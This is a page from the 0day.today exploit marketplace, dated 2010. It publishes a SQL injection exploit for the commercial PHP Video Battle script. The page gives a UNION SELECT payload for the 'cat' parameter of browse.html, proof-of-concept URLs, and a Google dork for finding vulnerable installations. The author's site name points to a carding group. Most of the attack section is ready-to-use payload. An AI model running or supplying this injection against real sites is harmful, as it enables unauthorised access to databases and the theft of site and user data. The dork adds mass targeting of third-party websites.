[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP Video Battle SQL Injection Vulnerability

Author
v3n0m
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12050
Category
web applications
Date add
29-04-2010
Platform
php
============================================
PHP Video Battle SQL Injection Vulnerability
============================================

Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : April, 29-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : PHP Video Battle
Vendor      : http://www.rocky.nu/
Price       : $40.00 USD
Google Dork : © 1998 - 2010 Video Battle Script
Overview    :
 
Battle of the best youtube videos! 2 videos side by side, choose which
is the best. Members can join and submit youtube video links.
Very easy to customize HTML system.
----------------------------------------------------------------
 
Exploit:
~~~~~~~
 
-9999+union+all+select+1,2,version(),4,5,6--
 
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/browse.html?cat=[SQLi]
http://127.0.0.1/[path]/browse.html?cat=-9999+union+all+select+1,2,version(),4,5,6--
----------------------------------------------------------------



#  0day.today [2024-12-25]  #